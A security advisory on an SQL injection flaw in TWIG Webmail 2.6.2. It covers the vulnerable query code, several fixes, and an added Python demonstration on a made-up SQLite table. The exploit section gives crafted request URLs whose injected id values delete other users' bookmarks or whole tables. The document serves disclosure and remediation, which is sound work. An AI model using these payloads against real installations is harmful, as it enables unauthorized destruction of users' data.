| TWIG is a cross-platform and browser-independent way to access information. The TWIG software uses unquoted SQL queries in its code, and this allows a remote attacker to insert additional SQL commands with his user input. |
| |
Credit:
The information has been provided by jenggo, Luki Rustianto, Ben Efros, Ryan Fox and Ben Laurie.
Vulnerable systems:
TWIG Webmail version 2.6.2
An unquoted SQL query string is a small mistake that can lead to huge damage. The free PHP webmail system TWIG is affected.
MySQL accepts an unquoted value in a query string if the field type is int, mediumint, tinyint or similar. The query:
DELETE FROM mytable WHERE id='1' AND owner='karet'
has the same effect when it is entered as follows:
DELETE FROM mytable WHERE id=1 AND owner='karet'
However, additional caution is required if the 'id' value in the above example is user-supplied data, since that user could then gain control over the SQL query and produce a modified version such as:
DELETE FROM mytable WHERE id=1 OR id=2 OR id=3 AND owner='karet'
^^^^^^^^^^^^^^^^
(modified value)
The modified query string above obviously has a different meaning from what was originally intended (the value of "$id=1" is changed to "$id=1 OR id=2 OR id=3").
Running grep -r "WHERE id=" <TWIG installation dir>/lib/* will list a lot of interesting functions whose query strings match this pattern (unquoted SQL queries).
Here are a few examples:
groups/personal.groups.inc.php3:
$query = "UPDATE " . $dbconfig["groups_table"] . " SET groupname='" .
$newname . "' WHERE id=" . $groupid;
[... many others]
schedule/schedule.edit.inc.php3:
$query = "DELETE FROM " . $dbconfig["schedule_table"] . " WHERE id = " .
$data["id"] . " AND (" . $groupquery . ")";
[... many others]
Solutions:
1) Force number fields to be numbers via type casting.
Example:
$query="SELECT field,otherfield from table where ID='" . ((int)$IDNumber) . "'";
2) Always apply addslashes() to any form-posted variable.
Example:
$query="SELECT field,otherfield from table where ID='" . addslashes($IDNumber) . "'";
3) Code a function specifically to strip any potentially malicious characters out of strings.
4) Use SQL placeholders, so that the dangerous values are not included in the statement at all.
Example:
SELECT foo, bar FROM wotsit WHERE thingy=?;
and the ? is supplied as a separate value.
Exploit:
Login as a normal user account ('eca' in this example), select the 'bookmarks' option and choose 'edit'. View the page source and find the important value:
[Cut to show only the strings we are interested in]
<==>
<hr><form action=/webmail/index.php3 method=POST>
<input type=hidden name=twig_sid value="983392539-1-eca">
<input type=hidden name=twig_cid value="983392539-14-eca">
<input type=hidden name=data[id] value=3>
<input type=hidden name=ItemID value=3>
<==>
<select name=data[groupid]>
<option value=0 >Unfiled</option>
<==>
<input type=submit name=submitbutton[delete] value="Delete">
<==>
NOTE: The URL could differ depending on the type of authentication you use. In this example, sqltable is used.
Actual URL:
http://192.168.0.18/webmail/index.php3?ts=983392426&twig_sid=983392414-1-eca&
twig_cid=983392414-14-eca&ItemID=3
Change it to:
http://192.168.0.18/webmail/index.php3?ts=983392426&twig_sid=983392539-1-eca&t
wig_cid=983392539-14-eca&ItemID=2&data[groupid]=0&
submitbutton[delete]=Delete&data[id]=2%20or%20id%3d2
Or for more damage (deleting all data):
http://192.168.0.18/webmail/index.php3?ts=983393006&twig_sid=983393050-1-eca&
twig_cid=983393050-14-eca&ItemID=2&data[id]=2%20or%20groupid%3d0&data[groupid]=0&
submitbutton[delete]=Delete
(NOTE: all URLs were wrapped for better readability)
The above URL changes the SQL query from:
DELETE FROM twig_bookmarks WHERE id=3 AND groupid=0 AND username='eca'
To:
DELETE FROM twig_bookmarks WHERE id=2 or id=2 AND groupid=0 AND username='eca'
Or, for the "more damage" URL:
DELETE FROM twig_bookmarks WHERE id=2 or groupid=0 AND groupid=0 AND username='eca'
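The following is an added example, not code from TWIG or from the advisory's authors: it rebuilds the bookmark DELETE statement above on an in-memory SQLite table with constructed rows, and runs the vulnerable concatenation next to two of the fixes from the Solutions section (type casting and placeholders). It also shows why the "more damage" query reaches rows of other users: AND binds tighter than OR, so "id=2 or groupid=0 AND groupid=0 AND username='eca'" is read as "id=2 OR (groupid=0 AND ... username='eca')".

```python
import sqlite3

# Constructed sample rows for the twig_bookmarks table: (id, groupid, username).
# Rows 2 and 5 belong to other users and must never be deletable by 'eca'.
SEED = [(1, 0, "eca"), (2, 0, "bob"), (3, 0, "eca"), (4, 1, "eca"), (5, 0, "alice")]

def fresh_db():
    """In-memory database holding a fresh copy of SEED."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE twig_bookmarks (id INTEGER, groupid INTEGER, username TEXT)")
    con.executemany("INSERT INTO twig_bookmarks VALUES (?, ?, ?)", SEED)
    return con

def delete_vulnerable(con, data_id, groupid, username):
    """Mirrors TWIG's concatenation: data[id] is pasted into the SQL unquoted.
    username is the logged-in user's name here, not form input."""
    query = ("DELETE FROM twig_bookmarks WHERE id=" + str(data_id)
             + " AND groupid=" + str(int(groupid))
             + " AND username='" + username + "'")
    return con.execute(query).rowcount  # number of rows actually deleted

def delete_cast(con, data_id, groupid, username):
    """Fix 1: cast the numeric field before it reaches the query.
    Python's int() raises ValueError on '2 or groupid=0'; PHP's (int) would
    keep only the leading '2'. Either way the injected tail never enters the SQL."""
    query = ("DELETE FROM twig_bookmarks WHERE id=" + str(int(data_id))
             + " AND groupid=" + str(int(groupid))
             + " AND username='" + username + "'")
    return con.execute(query).rowcount

def delete_placeholders(con, data_id, groupid, username):
    """Fix 4: placeholders, so the values are never part of the statement text.
    The injected string is compared as a value against the id column and matches nothing."""
    return con.execute(
        "DELETE FROM twig_bookmarks WHERE id=? AND groupid=? AND username=?",
        (data_id, groupid, username)).rowcount

def remaining_ids(con):
    """Sorted ids still present, to inspect what each variant removed."""
    return sorted(row[0] for row in con.execute("SELECT id FROM twig_bookmarks"))

if __name__ == "__main__":
    con = fresh_db()
    deleted = delete_vulnerable(con, "2 or groupid=0", 0, "eca")
    print("vulnerable:", deleted, "rows deleted, remaining", remaining_ids(con))
    con = fresh_db()
    deleted = delete_placeholders(con, "2 or groupid=0", 0, "eca")
    print("placeholders:", deleted, "rows deleted, remaining", remaining_ids(con))
```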